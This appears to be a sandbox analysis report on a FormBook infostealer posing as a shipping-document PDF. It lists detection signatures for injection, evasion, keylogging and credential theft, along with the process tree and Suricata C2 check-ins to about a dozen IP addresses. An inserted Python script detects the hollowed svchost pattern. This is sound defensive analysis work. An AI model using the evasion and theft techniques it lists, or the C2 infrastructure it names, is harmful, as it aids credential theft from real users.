Windows Analysis Report
SHIPPING DOCUMENTS_PDF.exe

Overview

General Information

Sample name: SHIPPING DOCUMENTS_PDF.exe
Analysis ID: 1573434
MD5: 8a85446ebb8eb07a56672afa7c1b7fbc
SHA1: bc089650b78a7ebd5210ab0ae9609df50497a9d3
SHA256: dfd126e677ab29f2de7b5305b3fcf75d096f2a1f69f79b6513136be7965f73f7
Tags: exe, user-mamrmtsh

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SHIPPING DOCUMENTS_PDF.exe (PID: 5668 cmdline: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe" MD5: 8A85446EBB8EB07A56672AFA7C1B7FBC)
    • svchost.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • pNkvbgLNQpIoyz.exe (PID: 5068 cmdline: "C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • waitfor.exe (PID: 2800 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • pNkvbgLNQpIoyz.exe (PID: 5884 cmdline: "C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5300 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Source | Rule | Description | Author
00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author
2.2.svchost.exe.4b0000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.4b0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe, ParentProcessId: 5668, ParentProcessName: SHIPPING DOCUMENTS_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", ProcessId: 6688, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe, ParentProcessId: 5668, ParentProcessName: SHIPPING DOCUMENTS_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", ProcessId: 6688, ProcessName: svchost.exe
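Both Sigma hits above fire on the same event: svchost.exe (PID 6688) is started by the sample, and its command line names the sample's own path rather than svchost.exe, which is what a process created suspended and then hollowed looks like in process-creation telemetry. As an added example (not code from Joe Sandbox and not the text of the Sigma rule), the script below applies two checks to a stream of process-creation events: a simplified uncommon-svchost-parent check whose allow-list only approximates the public rule's filter, and an image/command-line mismatch check that catches the hollowing pattern visible in the Data line. The sample events reproduce the process tree from this report; the parent of the initial sample is not shown in the report and is left unset.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation event (Sysmon event 1 / Security 4688 style)."""
    pid: int
    image: str
    command_line: str
    parent_pid: Optional[int]
    parent_image: Optional[str]


# Parents that legitimately start svchost.exe. This approximates the allow-list
# in the public Sigma rule "Uncommon Svchost Parent Process"; it is not a copy
# of it. Tune against your own baseline before deploying.
EXPECTED_SVCHOST_PARENTS = {
    "services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe",
    "svchost.exe", "ngen.exe", "tiworker.exe",
}


def basename(path: str) -> str:
    """Case-folded file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def executable_from_command_line(command_line: str) -> str:
    """Executable named by a Windows command line: the quoted first argument
    if present, otherwise everything up to the first space."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def uncommon_svchost_parent(ev: ProcessEvent) -> Optional[str]:
    """svchost.exe started by something other than the usual service hosts.
    Events without parent information are skipped, as the Sigma rule does."""
    if basename(ev.image) != "svchost.exe" or ev.parent_image is None:
        return None
    parent = basename(ev.parent_image)
    if parent in EXPECTED_SVCHOST_PARENTS:
        return None
    return f"uncommon svchost parent: {parent}"


def image_command_line_mismatch(ev: ProcessEvent) -> Optional[str]:
    """The loaded image differs from the executable the command line names.
    A process created suspended and hollowed keeps the original command line
    in its PEB, so telemetry reports the mismatch at creation time."""
    claimed = basename(executable_from_command_line(ev.command_line))
    actual = basename(ev.image)
    if claimed == actual:
        return None
    return f"image/command-line mismatch: image={actual} command_line={claimed}"


def analyse(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Run both checks over a batch of events; findings are keyed by PID."""
    findings: Dict[int, List[str]] = {}
    for ev in events:
        hits = [h for h in (uncommon_svchost_parent(ev),
                            image_command_line_mismatch(ev)) if h]
        if hits:
            findings[ev.pid] = hits
    return findings


# Process tree taken from this report (PIDs, images and command lines as
# listed there). The parent of the initial sample is not in the report.
DESKTOP = r"C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
DROPPED = (r"C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY"
           r"\pNkvbgLNQpIoyz.exe")
WAITFOR = r"C:\Windows\SysWOW64\waitfor.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\Firefox.exe"

SAMPLE_EVENTS = [
    ProcessEvent(5668, DESKTOP, f'"{DESKTOP}"', None, None),
    ProcessEvent(6688, SVCHOST, f'"{DESKTOP}"', 5668, DESKTOP),
    ProcessEvent(5068, DROPPED, f'"{DROPPED}"', 6688, SVCHOST),
    ProcessEvent(2800, WAITFOR, f'"{WAITFOR}"', 5068, DROPPED),
    ProcessEvent(5884, DROPPED, f'"{DROPPED}"', 2800, WAITFOR),
    ProcessEvent(5300, FIREFOX, f'"{FIREFOX}"', 2800, WAITFOR),
]

if __name__ == "__main__":
    for pid, hits in analyse(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Only PID 6688 is flagged, by both checks. The later stages of the tree (a randomly named executable under Program Files (x86), waitfor.exe spawning that executable and firefox.exe) are not caught by these two rules and need their own logic; the mismatch check is the cheaper of the two to keep enabled broadly, since legitimate processes almost never start with a command line that names a different executable than the one mapped.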
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-12T00:18:31.734026+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 3.33.130.190 | 80 | TCP
2024-12-12T00:18:56.671115+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49795 | 161.97.142.144 | 80 | TCP
2024-12-12T00:19:11.739098+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49834 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:27.352460+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49873 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:42.778154+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49911 | 150.109.11.247 | 80 | TCP
2024-12-12T00:19:58.045150+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49951 | 173.208.249.155 | 80 | TCP
2024-12-12T00:20:12.985064+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49986 | 209.74.79.42 | 80 | TCP
2024-12-12T00:20:29.047423+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50004 | 18.139.62.226 | 80 | TCP
2024-12-12T00:20:44.566392+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50008 | 101.32.205.61 | 80 | TCP
2024-12-12T00:21:02.186163+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50012 | 38.6.78.235 | 80 | TCP
2024-12-12T00:21:17.158405+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50016 | 3.125.36.175 | 80 | TCP
2024-12-12T00:22:10.730053+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50020 | 172.67.176.240 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-12T00:18:48.956793+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49776 | 161.97.142.144 | 80 | TCP
2024-12-12T00:18:51.613514+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49782 | 161.97.142.144 | 80 | TCP
2024-12-12T00:18:54.046754+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49789 | 161.97.142.144 | 80 | TCP
2024-12-12T00:19:03.680032+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49811 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:06.350235+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49817 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:09.037215+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49824 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:19.281036+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49850 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:22.002152+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49856 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:24.709648+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49864 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:34.784764+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49889 | 150.109.11.247 | 80 | TCP
2024-12-12T00:19:37.440962+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49896 | 150.109.11.247 | 80 | TCP
2024-12-12T00:19:40.097013+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49902 | 150.109.11.247 | 80 | TCP
2024-12-12T00:19:50.045715+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49929 | 173.208.249.155 | 80 | TCP
2024-12-12T00:19:52.710837+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49935 | 173.208.249.155 | 80 | TCP
2024-12-12T00:19:55.398864+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49941 | 173.208.249.155 | 80 | TCP
2024-12-12T00:20:04.998936+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49967 | 209.74.79.42 | 80 | TCP
2024-12-12T00:20:07.656869+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49974 | 209.74.79.42 | 80 | TCP
2024-12-12T00:20:10.574431+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49980 | 209.74.79.42 | 80 | TCP
2024-12-12T00:20:21.003076+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50001 | 18.139.62.226 | 80 | TCP
2024-12-12T00:20:23.660886+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50002 | 18.139.62.226 | 80 | TCP
2024-12-12T00:20:26.315495+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50003 | 18.139.62.226 | 80 | TCP
2024-12-12T00:20:36.572504+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50005 | 101.32.205.61 | 80 | TCP
2024-12-12T00:20:39.237742+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50006 | 101.32.205.61 | 80 | TCP
2024-12-12T00:20:41.893843+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50007 | 101.32.205.61 | 80 | TCP
2024-12-12T00:20:54.154006+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50009 | 38.6.78.235 | 80 | TCP
2024-12-12T00:20:56.845702+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50010 | 38.6.78.235 | 80 | TCP
2024-12-12T00:20:59.519970+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50011 | 38.6.78.235 | 80 | TCP
2024-12-12T00:21:09.175863+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50013 | 3.125.36.175 | 80 | TCP
2024-12-12T00:21:11.851422+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50014 | 3.125.36.175 | 80 | TCP
2024-12-12T00:21:14.495151+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50015 | 3.125.36.175 | 80 | TCP
2024-12-12T00:21:24.143527+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50017 | 172.67.176.240 | 80 | TCP
2024-12-12T00:21:26.799915+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50018 | 172.67.176.240 | 80 | TCP
2024-12-12T00:21:29.458673+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50019 | 172.67.176.240 | 80 | TCP
2024-12-12T00:22:18.180926+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50021 | 45.41.80.144 | 80 | TCP

                AV Detection

Source: SHIPPING DOCUMENTS_PDF.exe | ReversingLabs: Detection: 52%
Source: Yara match | File source: 2.2.svchost.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SHIPPING DOCUMENTS_PDF.exe | Joe Sandbox ML: detected
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: waitfor.pdbGCTL | source: svchost.exe, 00000002.00000003.2214923120.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472898129.0000000001498000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: waitfor.pdb | source: svchost.exe, 00000002.00000003.2214923120.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472898129.0000000001498000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170370235.0000000000F6E000.00000002.00000001.01000000.00000004.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473119648.0000000000F6E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030202293.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2029703617.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152549878.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153950004.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.000000000319E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2248057916.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2250042141.0000000004A7A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004C20000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004DBE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030202293.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2029703617.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2152549878.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153950004.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.000000000319E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000005.00000003.2248057916.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2250042141.0000000004A7A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004C20000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004DBE000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BB445A: GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BBC6D1: FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BBC75C: FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BBEF95: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BBF0F2: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BBF3F3: FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BB37EF: FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BB3B12: FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BBBCBC: FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 5_2_02C7C290: FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 5_2_02C69E40: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 5_2_02C6DF01: 4x nop then pop edi
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 5_2_04A104EF: 4x nop then mov ebx, 00000004h

                Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49776 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49795 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49789 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49824 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49817 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49856 -> 124.71.162.21:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49864 -> 124.71.162.21:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49782 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49811 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49896 -> 150.109.11.247:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49911 -> 150.109.11.247:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49929 -> 173.208.249.155:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49740 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49902 -> 150.109.11.247:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49941 -> 173.208.249.155:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49951 -> 173.208.249.155:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49935 -> 173.208.249.155:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49967 -> 209.74.79.42:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49834 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49850 -> 124.71.162.21:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 38.6.78.235:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 3.125.36.175:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 101.32.205.61:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 3.125.36.175:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 209.74.79.42:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 172.67.176.240:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 38.6.78.235:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 101.32.205.61:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 3.125.36.175:80
